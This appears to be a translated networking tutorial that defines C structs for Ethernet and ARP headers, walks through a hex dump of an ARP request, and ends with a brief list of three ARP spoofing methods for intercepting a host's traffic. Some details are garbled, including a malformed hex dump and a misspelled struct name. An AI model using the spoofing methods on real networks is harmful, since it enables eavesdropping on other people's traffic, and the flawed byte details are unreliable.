The structure ether_header defines the Ethernet frame header; the structure arphdr defines the next five fields, and its information is used to transmit ARP requests and answers on any type of media; in addition to the arphdr structure, the ether_arp structure also contains the addresses of the source and target hosts. Definition
#define EPT_IP 0x0800 /* type: IP */#define EPT_ARP 0x0806 /* type: ARP */#define EPT_RARP 0x8035 /* type: RARP */#define ARP_HARDWARE 0x0001 /* Dummy type for 802.3 frames */#define ARP_REQUEST 0x0001 /* ARP request */#define ARP_REPLY 0x0002 /* ARP reply */
Define the Ethernet header
struct sniff_ethernet{u_char ether_dhost[ETHER_ADDR_LEN];u_char ether_shost[ETHER_ADDR_LEN];u_short ether_type;};
Define the Ethernet arp Field
typedef struct aprhdr{u_int16_t htype;//Hardware typeu_int16_t ptype;//protocol typeu_char hlen;//Hardware address lengthu_char plen;//protocol address lengthu_int16_t oper;//operation codeu_char sha[6];//sender hardware addressu_char spa[4];//sender ip addressu_char tha[6];//target hardware addressu_char tpa[4];//target ip address}arphdr_t;
Defines the entire arp packet, with a total length of 42 bytes
typedef struct arpPacket{EHHDR ehhdr;ARPHDR arphdr;} ARPPACKET, *PARPPACKET;
ARP request packet analysis: as shown in the following figure, an ARP request packet
0000 ff 00 0c f1 d4 d9 60 08 06 00 01 ...........'....
0010 08 00 06 04 00 01 00 0c f1 d4 d9 60 c0 a8 01 0f ...........'....
0020 00 00 00 00 00 c0 a8 01 02 ..........
According to definition, the first six bytes are the destination ethernet address ff. This is a broadcast address, which can be received by all terminals on the entire network. The following six bytes are the Ethernet source address, that is, the sender's MAC address (00 0c f1 d4 d9 60 is my MAC address ).
The frame type 0806 occupies two bytes, so the Ethernet frame header ends here. 0806 indicates that the subsequent data belongs to the arp packet.
Then analyze the ARP packet header. The first two bytes are of the hardware Type 00 01, and the next two bytes are of the protocol type, that is, ARP uses the IP protocol code 08 00. The hardware address length and Protocol address length are 6 and 4, respectively. This corresponds to the ARP packet format. The next two bytes of OP indicate whether the current package is a request package or a response package. The corresponding values are 0x0001 and 0x0002, respectively. The original data is 00 01, so this is a request packet, and the six bytes are the sender's MAC address 00 0C F1 D4 D9 60. The next four bytes are the sender's IP address C0 A8 01 0f, convert to the dotted-decimal format 192.168.1.15. This is my IP address. Leave the following six bytes blank, 00
00 00 00 00 can also be other data in the ARP request packet, because the IP address C0 A8 01 02 (192.168.1.2) will fill in its MAC address into these 6 bytes later.
After filling in, the sender's hardware address in the ARP packet | the destination hardware address and the Ethernet destination address of the Ethernet header | the Ethernet source address is in the correct tone. Finally, send the encapsulated ARP packet so that the two terminals can know each other's IP address and MAC address.
Three basic methods of ARP spoofing:
1. Host C impersonates gateway to spoof host B;
2. Host C impersonates host B as a spoofing gateway;
3. Host C spoofs host B and gateway at the same time to implement data transfer and listen to data of all host B.